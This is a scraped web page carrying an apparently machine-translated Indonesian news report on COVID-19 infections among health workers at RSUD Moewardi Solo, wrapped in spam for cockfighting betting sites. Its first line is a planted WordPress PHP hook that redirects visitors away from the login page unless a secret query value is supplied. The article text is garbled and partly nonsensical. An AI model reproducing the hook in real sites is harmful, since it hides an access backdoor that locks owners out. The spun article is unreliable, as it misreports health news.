//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Ratusan staf medis di Rumah Sakit Moewardi Solo aktif Dr. Covid-19, dan 20 orang masih dalam isolasi | adu ayam bali_s128.net login_s128.live

Ratusan staf medis di Rumah Sakit Moewardi Solo aktif Dr. Covid-19, dan 20 orang masih dalam isolasi

TRIBUNNEWS.COM-Ratusan tenaga kesehatan (tenaga kesehatan) yang saat ini bertugas di RSUD Dokter Moewardi Surakarta (solo) dinyatakan positif corona (Covid-19). Pulih secara bertahap.

Menurut data terakhir yang dia lihat, sekitar 20 pasien telah diisolasi di dokter RSUD Moewardi Solo.

“Saat ini, masih ada beberapa orang yang terisolasi. Data terbaru yang saya lihat di sekitar kita. Orang-orang berusia 20-an terisolasi dari dunia, tetapi semuanya baik-baik saja.”

“Saya harap mereka satu atau dua Saya bisa pulang dalam beberapa hari, “kata Cahyono Hadi dalam pembaruan video. Ini akan ditayangkan pada hari Senin (27 Juli 2020) melalui saluran YouTube Kompastv. ———— Cahyono Hadi menambahkan, beberapa petugas kesehatan terpaksa dikarantina dan sebagian besar sudah kembali ke rumah sakit. – Pasien-pasien ini dinyatakan positif Covid-19 pada tes usap pertama. Namun, tes kedua yang dilakukan tiga hari kemudian menunjukkan hasil negatif.

Rumah sakit memastikan bahwa staf medis dan karyawan lain akan mendapat manfaat dari keselamatan prioritas.

Namun, mereka juga mendesak pasien yang mencari perawatan dari dokter RSUD Moewardi Solo untuk jujur ​​tentang gejala yang mereka derita.

Untuk menghindari berjangkitnya Covid-19 di rumah sakit nasional.

Leave a comment

adu ayam bali_s128.net login_s128.live